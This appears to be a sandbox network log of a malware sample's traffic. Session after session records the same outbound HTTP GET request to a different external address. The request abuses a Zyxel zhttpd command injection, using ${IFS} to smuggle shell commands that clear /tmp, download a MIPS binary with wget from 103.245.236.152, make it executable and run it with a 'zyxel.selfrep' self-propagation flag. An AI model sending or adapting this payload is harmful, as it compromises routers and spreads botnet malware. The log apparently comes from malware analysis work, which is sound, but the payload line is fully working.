                                      Jan 14, 2024 15:50:35.026550055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1454192.168.2.144053681.23.166.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026587009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1455192.168.2.143926061.120.176.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026640892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1456192.168.2.1448196149.193.220.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026664019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1457192.168.2.144949431.67.218.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026695013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1458192.168.2.1442034188.94.140.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026748896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1459192.168.2.1439998181.238.18.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026787996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1460192.168.2.1433970174.22.34.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026809931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1461192.168.2.1441266203.7.14.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026890993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1462192.168.2.1439176133.59.101.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026940107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1463192.168.2.1442174176.44.254.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.026993990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1464192.168.2.1441370117.244.227.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027038097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1465192.168.2.144975091.79.24.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027071953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1466192.168.2.1436870145.169.210.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027103901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1467192.168.2.1434550146.170.0.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027132988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1468192.168.2.145894895.224.239.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027153969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1469192.168.2.1444284109.156.73.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027211905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1470192.168.2.1445464171.227.82.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027245045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1471192.168.2.146064843.107.20.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027287006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1472192.168.2.1451656154.37.47.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027353048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1473192.168.2.1437100102.147.84.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027410030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1474192.168.2.145511673.13.205.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027455091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1475192.168.2.1460418103.224.69.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027487993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1476192.168.2.144957269.41.4.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027529001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1477192.168.2.1439126126.146.64.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027575016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1478192.168.2.1447122130.221.228.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027632952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1479192.168.2.1441476174.191.104.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027646065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1480192.168.2.143760250.55.89.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027686119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1481192.168.2.1454600171.38.206.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027733088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1482192.168.2.1445866148.109.125.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027785063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1483192.168.2.1440518185.186.104.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027810097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1484192.168.2.144221498.229.189.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027870893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1485192.168.2.144734419.9.219.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027883053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1486192.168.2.1449694199.140.139.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027947903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1487192.168.2.1440222204.74.39.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.027981997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1488192.168.2.143906067.243.71.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028037071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1489192.168.2.1442272200.248.176.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028059959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1490192.168.2.144074244.236.233.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028105021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1491192.168.2.1434154199.64.121.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028137922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1492192.168.2.1440986217.151.160.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028161049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1493192.168.2.1442006123.79.127.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028199911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1494192.168.2.1433600150.142.130.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028228998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1495192.168.2.14558941.34.224.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028244019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1496192.168.2.145273865.64.197.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028285027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1497192.168.2.1447680182.30.68.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028321981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1498192.168.2.144694684.105.78.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028361082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1499192.168.2.143712285.26.45.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028400898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1500192.168.2.143704618.163.173.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028431892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1501192.168.2.1447974216.192.141.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028508902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1502192.168.2.1446508135.223.185.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028541088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1503192.168.2.145048685.226.254.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028595924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1504192.168.2.144924471.93.75.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028659105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1505192.168.2.1456702111.216.233.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028702021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1506192.168.2.1448678108.187.222.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028733969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1507192.168.2.145311234.64.182.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028784990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1508192.168.2.1457102120.202.26.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028810024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1509192.168.2.144212854.150.4.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028858900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1510192.168.2.1456692168.44.50.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028883934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1511192.168.2.1446620157.210.208.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028914928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1512192.168.2.14520544.174.61.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.028963089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1513192.168.2.145570236.2.246.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029017925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1514192.168.2.14392421.130.5.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029047966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1515192.168.2.1440608183.180.124.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.029093981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1516192.168.2.1451012212.199.55.126443
                                      TimestampBytes transferredDirectionData
